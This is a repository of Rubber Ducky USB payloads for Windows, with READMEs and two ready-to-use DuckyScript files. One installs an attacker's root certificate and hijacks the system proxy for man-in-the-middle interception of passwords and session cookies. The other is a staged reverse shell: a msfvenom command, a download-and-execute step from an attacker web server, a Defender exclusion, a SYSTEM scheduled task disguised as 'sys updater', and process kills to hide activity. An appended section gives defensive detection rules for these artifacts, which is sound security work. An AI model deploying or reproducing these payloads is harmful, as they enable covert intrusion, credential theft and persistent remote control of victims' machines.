├── README.md
├── remote-proxy
│   ├── README.md
│   └── windows-remote-proxy-payload.txt
└── reverse-shell
    ├── README.md
    └── windows-reverse-shell-payload.txt

/README.md:
--------------------------------------------------------------------------------
# README

*This code does not promote or encourage any illegal activities. The content in this document is provided solely for educational purposes and to create awareness.*

# Rubber Ducky Payload Repository

This repository contains a collection of payloads for the Rubber Ducky created by DVBNL. The compiled *.bin files can also be found in the specific payload folders.

## Repository Structure

This repository is organized by the type of payload. Each payload has its own directory which contains the payload script and a README file explaining what the payload does and how to use it.

## How to Use

To use a payload, follow these steps:

1. Navigate to the directory of the payload you want to use.
2. Read the README file for instructions on how to use the payload.
3. Load the payload onto your Rubber Ducky according to the instructions.

## Contributing

Contributions are welcome! If you have a payload you'd like to add, please open a pull request.

## Disclaimer

These payloads are provided for educational purposes only. DVBNL is not responsible for any damage caused by the misuse of these payloads.

--------------------------------------------------------------------------------
/remote-proxy/README.md:
--------------------------------------------------------------------------------
# README

This code does not promote or encourage any illegal activities. The content in this document is provided solely for educational purposes and to create awareness.

# Set remote/local proxy server

This script automates the setup of a remote proxy for Man-in-the-Middle (MITM) attacks on Windows systems. It has been tested on Windows 10 and Windows 11. The script performs the following tasks:

1. Starts Windows Terminal as an administrator.
2. Downloads and installs the Burp Suite CA certificate (or the CA of another proxy).
3. Configures the system proxy to use a specified remote proxy server.
4. Cleans up by terminating all active Windows Terminal and PowerShell processes.

Requirements:

- The root CA certificate of your proxy server, and a remote web server to download it from
- A remote or local forward proxy server such as Burp Suite to intercept traffic

## 1 - Ducky script and execute

When your proxy server is running and the CA can be downloaded, change the variables in the script:

- LINE 28 === Webserver
  Change "http://yourwebserver/ca.der" to your own web server where the certificate can be obtained.
- LINE 48 === Proxyserver
  Change "your.proxy.server:port" to your own remote or local IP address where the proxy server is listening, and add the TCP port.

Once the payload has executed you can remotely sniff unencrypted traffic and intercept passwords or session cookies to bypass MFA.

--------------------------------------------------------------------------------
/reverse-shell/README.md:
--------------------------------------------------------------------------------
# README

This code does not promote or encourage any illegal activities. The content in this document is provided solely for educational purposes and to create awareness.

# Staged TCP Reverse Shell with Rubber Ducky script within Windows Terminal

Since Microsoft pushed the latest 22H2 update for Windows 11, all PowerShell reverse shell payloads have stopped working. Microsoft made changes to the way command-line tools are opened. Everything is now opened in the new "Windows Terminal", and the "powershell -nop -noni -W hidden" commands no longer work.

This reverse shell script is tested on the latest Windows version and is working properly.

Requirements:

- The executable itself - Step 1
- HTTP server to host the shell executable - Step 2

## 1 - Craft malicious executable

I'm using a Staged Meterpreter TCP reverse shell executable. To craft one you can use "msfvenom" with the following command:

`msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-LISTENER] LPORT=[PORT-LISTENER] -f exe > payload.exe`

Change the LHOST and LPORT to your own listener server.

## 2 - Ducky script and execute

**Option 1: Simple Python Webserver**

Navigate to the directory containing shell.exe and run:

```
python3 -m http.server 8080
```

**Option 2: Docker + Apache Webserver**

Create a lightweight Apache container and map your executable folder:

```
docker create --name webserver \
  -p 8080:80 \
  -v [PATH-TO-FOLDER-WITH-EXECUTABLE]:/usr/local/apache2/htdocs:ro \
  httpd:2.4-alpine
```

Then start the container:

```
docker start webserver
```

Now you can access the file at:

```
http://:8080/payload.exe
```

Next, change the variables in the script:

- LINE 25 === VARIABLES
  Changing the paths is optional. I'm using C:\temp to create the folder and exclude it within MS Defender. If you want a different path or executable name you can change them.
- LINE 36 === URL
  This one is important because the target computer needs to download your crafted executable. Fill in the URL of your HTTP server and specify the folder/filename.

--------------------------------------------------------------------------------
/remote-proxy/windows-remote-proxy-payload.txt:
--------------------------------------------------------------------------------
```
 1 | REM |=========================================================================|
 2 | REM Remote Proxy for MITM attacks
 3 | REM Author: DVBNL
 4 | REM Version 1.0
 5 | REM OS Tested: Windows 11, Windows 10
 6 | REM Prerequisites are either a local proxy or remote proxy server (preferably with SSL/443)
 7 | REM |=========================================================================|
 8 |
 9 | ATTACKMODE HID
10 |
11 | REM |===Start Windows Terminal as admin===|
12 | DELAY 2000
13 | GUI r
14 | DELAY 250
15 | STRING powershell "start-process wt -verb runas"
16 | ENTER
17 | DELAY 2500
18 | LEFT
19 | ENTER
20 | DELAY 1500
21 |
22 | REM |===Powershell Block to download the Burpsuite CA & install it===|
23 | STRING_POWERSHELL
24 | $dir = "C:\temp";
25 | $ca = "$dir\root-ca.der";
26 | New-Item -Path $dir -ItemType Directory;
27 | Invoke-Webrequest -Uri http://yourwebserver/ca.der -OutFile $ca;
28 | $certdir = "$ca";
29 | $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2;
30 | $cert.Import($certdir);
31 | $store = New-Object System.Security.Cryptography.X509Certificates.X509Store("Root", "LocalMachine");
32 | $store.Open("ReadWrite");
33 | $store.Add($cert);
34 | $store.Close();
35 | END_STRING
36 | ENTER
37 |
38 | REM |===Set system proxy to remote proxy server===|
39 | STRING_POWERSHELL
40 | $proxy = ":";
41 | $bypass = "";
42 | $registryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings";
43 | $proxyServer = $proxy;
44 | $proxyOverride = $bypass;
45 | Set-ItemProperty -Path $registryPath -Name ProxyServer -Value $proxyServer;
46 | Set-ItemProperty -Path $registryPath -Name ProxyOverride -Value $proxyOverride;
47 | Set-ItemProperty -Path $registryPath -Name ProxyEnable -Value 1;
48 | Set-ItemProperty -Path $registryPath -Name MigrateProxy -Value 1;
49 | Set-ItemProperty -Path $registryPath -Name ProxyHttp1.1 -Value 1;
50 | Set-ItemProperty -Path $registryPath -Name ProxyServer -Value $proxyServer;
51 | Set-ItemProperty -Path $registryPath -Name ProxyOverride -Value $proxyOverride;
52 | Set-ItemProperty -Path $registryPath -Name ProxyEnable -Value 1;
53 | Set-ItemProperty -Path $registryPath -Name MigrateProxy -Value 1;
54 | Set-ItemProperty -Path $registryPath -Name ProxyHttp1.1 -Value 1;
55 | END_STRING
56 | ENTER
57 |
58 | REM |===Kill all active wt or powershell processes (Visibility)===|
59 | STRING Stop-Process -Name powershell, WindowsTerminal
60 | ENTER
```

--------------------------------------------------------------------------------
/reverse-shell/windows-reverse-shell-payload.txt:
--------------------------------------------------------------------------------
```
 1 | REM |=========================================================================|
 2 | REM Staged Interpreter TCP Reverse Ducky Shell
 3 | REM Author: DVBNL
 4 | REM Version 2.3
 5 | REM OS Tested: Windows 11, Windows 10
 6 | REM INTERPRETER STAGED REVERSE SHELL > executable
 7 | REM WORKS WITH NEWEST WINDOWS TERMINAL (wt.exe)
 8 | REM |=========================================================================|
 9 |
10 | ATTACKMODE HID
11 |
12 | REM |===Start Windows Terminal as admin===|
13 | DELAY 2000
14 | GUI r
15 | DELAY 250
16 | STRING powershell "start-process wt -verb runas"
17 | ENTER
18 | DELAY 2500
19 | LEFT
20 | ENTER
21 | DELAY 1000
22 |
23 | REM |===Powershell Block to create variables and add exclusions to Windows Defender===|
24 | STRING $dir = "C:\temp";
25 | ENTER
26 | STRING $shell = "$dir\shell.exe"; New-Item -Path $dir -ItemType Directory;
27 | ENTER
28 | STRING Add-MpPreference -ExclusionPath $dir;
29 | ENTER
30 | DELAY 250
31 |
32 | REM |===Download shell executable from Webserver and RUN!===|
33 | STRING $desturl = "http://yourwebserver/payload.exe";
34 | ENTER
35 | STRING Invoke-WebRequest -Uri $desturl -OutFile $shell; Start-Process $shell;
36 | ENTER
37 |
38 | REM |===Persistence with adding the executable as scheduled task===|
39 | STRING $tn='sys updater'; $script=Join-Path $dir 'run.ps1'; if(-not (Test-Path $script)){Set-Content -Path $script -Encoding UTF8 -Value ' Invoke-WebRequest -Uri $desturl -OutFile $shell; Start-Process -FilePath "$shell" -WindowStyle Hidden'}; $ps="$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"; $arg=('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "{0}"' -f $script); $act=New-ScheduledTaskAction -Execute $ps -Argument $arg -WorkingDirectory $dir; $trg=New-ScheduledTaskTrigger -Daily -At 01:00; $trg.StartBoundary=(Get-Date -Hour 1 -Minute 0 -Second 0).AddDays(-1).ToString('s'); $trg.Repetition=New-CimInstance -Namespace root/Microsoft/Windows/TaskScheduler -ClassName MSFT_TaskRepetitionPattern -ClientOnly -Property @{Interval='PT5M';Duration='PT23H59M'}; $set=New-ScheduledTaskSettingsSet -StartWhenAvailable -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit (New-TimeSpan -Hours 24) -MultipleInstances Parallel; if(Get-ScheduledTask -TaskName $tn -ErrorAction SilentlyContinue){Unregister-ScheduledTask -TaskName $tn -Confirm:$false}; Register-ScheduledTask -TaskName $tn -Action $act -Trigger $trg -Settings $set -RunLevel Highest -User 'SYSTEM'
40 | DELAY 250
41 | ENTER
42 |
43 | REM |===Kill all active wt or powershell processes (Visibility)===|
44 | STRING Stop-Process -Name powershell, WindowsTerminal
45 | ENTER
```
--------------------------------------------------------------------------------
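Both payloads above leave a consistent trail on the host: the remote-proxy script adds a certificate to the LocalMachine Root store and rewrites the WinINet proxy values under HKCU\...\Internet Settings; the reverse-shell script adds a Defender path exclusion, runs a download-and-execute command line from Windows Terminal, and registers a hidden PowerShell scheduled task as SYSTEM. The Python below is an added example of detection logic a SOC could run over that telemetry; it is not part of the DVBNL repository. The events are constructed, simplified renditions of Sysmon (ID 1 process creation, ID 13 registry value set), the Defender operational log (ID 5007 configuration change) and the Security log (ID 4698 scheduled task created); the dictionary field names, thumbprint, addresses and paths are assumptions, not the real log schema.

```python
"""Detection rules for the host artifacts left by the remote-proxy and reverse-shell payloads.

Added example, not part of the DVBNL repository. Events are CONSTRUCTED,
simplified renditions of Sysmon/Defender/Security log records; field names are assumptions.
"""
import re
from typing import Callable, Optional

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WT = r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x\WindowsTerminal.exe"  # placeholder version folder
SETTINGS = r"C:\Windows\ImmersiveControlPanel\SystemSettings.exe"

EVENTS = [  # constructed sample telemetry; events 0-5 mirror the payloads, 6-8 are benign noise
    {"id": 13, "image": PS, "details": "Binary Data",  # $store.Add($cert) on the Root store
     "target": r"HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0123456789ABCDEF0123456789ABCDEF01234567\Blob"},
    {"id": 13, "image": PS, "details": "203.0.113.10:8080",  # ProxyServer -> external host (TEST-NET address)
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer"},
    {"id": 13, "image": PS, "details": "DWORD (0x00000001)",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable"},
    {"id": 5007, "message": r"Microsoft Defender Antivirus Configuration has changed. New value: "
                            r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\temp = 0x0"},
    {"id": 1, "image": PS, "parent_image": WT,
     "command_line": "powershell Invoke-WebRequest -Uri $desturl -OutFile $shell; Start-Process $shell;"},
    {"id": 4698, "task_name": r"\sys updater",
     "task_content": "<Task><Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>"
                     "<Triggers><CalendarTrigger><Repetition><Interval>PT5M</Interval></Repetition></CalendarTrigger></Triggers>"
                     "<Actions><Exec><Command>" + PS + "</Command><Arguments>-NoProfile -ExecutionPolicy Bypass "
                     '-WindowStyle Hidden -File "C:\\temp\\run.ps1"</Arguments></Exec></Actions></Task>'},
    {"id": 13, "image": SETTINGS, "details": "DWORD (0x00000000)",  # user turns the proxy off in Settings
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable"},
    {"id": 5007, "message": r"Microsoft Defender Antivirus Configuration has changed. New value: "
                            r"HKLM\SOFTWARE\Microsoft\Windows Defender\Scan\ScheduleDay = 0x2"},
    {"id": 1, "image": PS, "parent_image": WT, "command_line": r"powershell Get-ChildItem C:\Users"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I)
EXECUTE = re.compile(r"Start-Process|Invoke-Item|Invoke-Expression|\biex\b", re.I)


def _is_script_host(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS


def rogue_root_ca(e: dict) -> Optional[str]:
    """Sysmon 13: a script host writing a certificate Blob into the LocalMachine Root store."""
    if e["id"] == 13 and _is_script_host(e["image"]) and re.search(
            r"\\SystemCertificates\\ROOT\\Certificates\\[0-9A-F]{40}\\Blob$", e["target"], re.I):
        return "certificate added to LocalMachine Root store by " + e["image"]
    return None


def proxy_hijack(e: dict) -> Optional[str]:
    """Sysmon 13: a script host setting ProxyServer, or flipping ProxyEnable to 1."""
    if e["id"] != 13 or not _is_script_host(e["image"]):
        return None
    key, _, name = e["target"].rpartition("\\")
    if not key.lower().endswith(r"\internet settings"):
        return None
    if name == "ProxyServer" or (name == "ProxyEnable" and e["details"].endswith("1)")):
        return f"{name} = {e['details']}"
    return None


def defender_exclusion(e: dict) -> Optional[str]:
    """Defender 5007: configuration change that adds a path, extension or process exclusion."""
    if e["id"] == 5007:
        m = re.search(r"Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\\(.+?) = ", e["message"])
        if m:
            return f"{m.group(1)} exclusion added: {m.group(2)}"
    return None


def download_and_execute(e: dict) -> Optional[str]:
    """Sysmon 1: a single command line that both fetches content and launches it."""
    cl = e.get("command_line", "")
    if e["id"] == 1 and DOWNLOAD.search(cl) and EXECUTE.search(cl):
        return "download-and-execute command line: " + cl
    return None


def suspicious_task(e: dict) -> Optional[str]:
    """Security 4698: task running as SYSTEM with a hidden or policy-bypassing PowerShell action."""
    if e["id"] != 4698:
        return None
    xml = e["task_content"]
    hidden = re.search(r"-ExecutionPolicy Bypass|-W(?:indowStyle)? Hidden", xml, re.I)
    if "<UserId>S-1-5-18</UserId>" in xml and hidden:
        return f"task {e['task_name']} runs hidden PowerShell as SYSTEM"
    return None


RULES: dict = {
    "rogue-root-ca": rogue_root_ca,
    "proxy-hijack": proxy_hijack,
    "defender-exclusion": defender_exclusion,
    "download-and-execute": download_and_execute,
    "suspicious-scheduled-task": suspicious_task,
}


def detect(events: list) -> list:
    """Apply every rule to every event; return (event index, rule name, detail) triples."""
    findings = []
    for i, e in enumerate(events):
        for rule_name, rule in RULES.items():
            detail = rule(e)
            if detail:
                findings.append((i, rule_name, detail))
    return findings


if __name__ == "__main__":
    for idx, rule_name, detail in detect(EVENTS):
        print(f"event {idx}: [{rule_name}] {detail}")
```

Run over the constructed sample, the rules fire once on each of the six payload-derived events and stay silent on the three benign ones: the proxy toggle written by SystemSettings.exe is not a script host, the Defender scan-schedule change is not an exclusion, and an ordinary PowerShell command line downloads nothing. In a real deployment the proxy rule would additionally compare the ProxyServer value against the organisation's known proxy addresses, and the root-store rule would allowlist legitimate certificate-deployment tooling.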